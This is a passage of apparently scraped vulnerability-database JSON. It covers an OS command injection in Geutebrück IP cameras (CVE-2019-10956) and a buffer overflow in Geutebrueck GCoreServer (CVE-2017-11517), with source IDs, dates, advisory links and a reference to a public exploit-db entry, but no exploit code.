"id": "CVE-2019-10956"
},
{
"db": "BID",
"id": "108579"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014194"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-088"
},
{
"db": "NVD",
"id": "CVE-2019-10956"
}
]
},
"id": "VAR-202001-1487",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-22346"
}
],
"trust": 1.5020833375
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-22346"
}
]
},
"last_update_date": "2024-11-23T21:51:41.399000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "https://www.geutebrueck.com/"
},
{
"title": "Patch for Geutebr\u00fcck G-Cam and G-Code OS command injection vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchInfo/show/213553"
},
{
"title": "Multiple Geutebr\u00fcck Product Command Injection Vulnerability Fixes",
"trust": 0.6,
"url": "http://www.cnnvd.org.cn/web/xxk/bdxqById.tag?id=93177"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-22346"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014194"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-088"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-78",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-014194"
},
{
"db": "NVD",
"id": "CVE-2019-10956"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://www.us-cert.gov/ics/advisories/icsa-19-155-03"
},
{
"trust": 1.6,
"url": "https://ics-cert.us-cert.gov/advisories/icsa-19-155-03"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2019-10956"
},
{
"trust": 0.9,
"url": "https://www.geutebrueck.com/en_en.html"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2019-10956"
},
{
"trust": 0.7,
"url": "https://www.securityfocus.com/bid/108579"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/78.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2020-22346"
},
{
"db": "VULMON",
"id": "CVE-2019-10956"
},
{
"db": "BID",
"id": "108579"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014194"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-088"
},
{
"db": "NVD",
"id": "CVE-2019-10956"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2020-22346"
},
{
"db": "VULMON",
"id": "CVE-2019-10956"
},
{
"db": "BID",
"id": "108579"
},
{
"db": "JVNDB",
"id": "JVNDB-2019-014194"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-088"
},
{
"db": "NVD",
"id": "CVE-2019-10956"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-04-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-22346"
},
{
"date": "2020-01-17T00:00:00",
"db": "VULMON",
"id": "CVE-2019-10956"
},
{
"date": "2019-06-05T00:00:00",
"db": "BID",
"id": "108579"
},
{
"date": "2020-02-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-014194"
},
{
"date": "2019-06-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-088"
},
{
"date": "2020-01-17T18:15:12.040000",
"db": "NVD",
"id": "CVE-2019-10956"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2020-04-12T00:00:00",
"db": "CNVD",
"id": "CNVD-2020-22346"
},
{
"date": "2020-01-24T00:00:00",
"db": "VULMON",
"id": "CVE-2019-10956"
},
{
"date": "2019-06-05T00:00:00",
"db": "BID",
"id": "108579"
},
{
"date": "2020-02-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2019-014194"
},
{
"date": "2020-01-19T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-088"
},
{
"date": "2024-11-21T04:20:13.833000",
"db": "NVD",
"id": "CVE-2019-10956"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-088"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Geutebruck IP Camera G-Code and G-Cam In OS Command injection vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2019-014194"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "operating system commend injection",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-088"
}
],
"trust": 0.6
}
}
CVE-2017-11517 (GCVE-0-2017-11517)
Vulnerability from nvd – Published: 2017-07-21 20:00 – Updated: 2024-09-17 01:25- n/a
| URL | Tags |
|---|---|
| https://www.exploit-db.com/exploits/41153/ | exploitx_refsource_EXPLOIT-DB |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T18:12:40.088Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "41153",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "https://www.exploit-db.com/exploits/41153/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Stack-based buffer overflow in GCoreServer.exe in the server in Geutebrueck Gcore 1.3.8.42 and 1.4.2.37 allows remote attackers to execute arbitrary code via a long URI in a GET request."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-07-21T20:00:00.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "41153",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "https://www.exploit-db.com/exploits/41153/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2017-11517",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Stack-based buffer overflow in GCoreServer.exe in the server in Geutebrueck Gcore 1.3.8.42 and 1.4.2.37 allows remote attackers to execute arbitrary code via a long URI in a GET request."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "41153",
"refsource": "EXPLOIT-DB",
"url": "https://www.exploit-db.com/exploits/41153/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2017-11517",
"datePublished": "2017-07-21T20:00:00.000Z",
"dateReserved": "2017-07-21T00:00:00.000Z",
"dateUpdated": "2024-09-17T01:25:55.226Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2017-11517 (GCVE-0-2017-11517)
Vulnerability from cvelistv5 – Published: 2017-07-21 20:00 – Updated: 2024-09-17 01:25- n/a
| URL | Tags |
|---|---|
| https://www.exploit-db.com/exploits/41153/ | exploitx_refsource_EXPLOIT-DB |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-05T18:12:40.088Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "41153",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB",
"x_transferred"
],
"url": "https://www.exploit-db.com/exploits/41153/"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "Stack-based buffer overflow in GCoreServer.exe in the server in Geutebrueck Gcore 1.3.8.42 and 1.4.2.37 allows remote attackers to execute arbitrary code via a long URI in a GET request."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2017-07-21T20:00:00.000Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"name": "41153",
"tags": [
"exploit",
"x_refsource_EXPLOIT-DB"
],
"url": "https://www.exploit-db.com/exploits/41153/"
}
],
"x_legacyV4Record": {
"CVE_data_meta": {
"ASSIGNER": "cve@mitre.org",
"ID": "CVE-2017-11517",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "n/a",
"version": {
"version_data": [
{
"version_value": "n/a"
}
]
}
}
]
},
"vendor_name": "n/a"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "Stack-based buffer overflow in GCoreServer.exe in the server in Geutebrueck Gcore 1.3.8.42 and 1.4.2.37 allows remote attackers to execute arbitrary code via a long URI in a GET request."
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"lang": "eng",
"value": "n/a"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "41153",
"refsource": "EXPLOIT-DB",
"url": "https://www.exploit-db.com/exploits/41153/"
}
]
}
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2017-11517",
"datePublished": "2017-07-21T20:00:00.000Z",
"dateReserved": "2017-07-21T00:00:00.000Z",
"dateUpdated": "2024-09-17T01:25:55.226Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}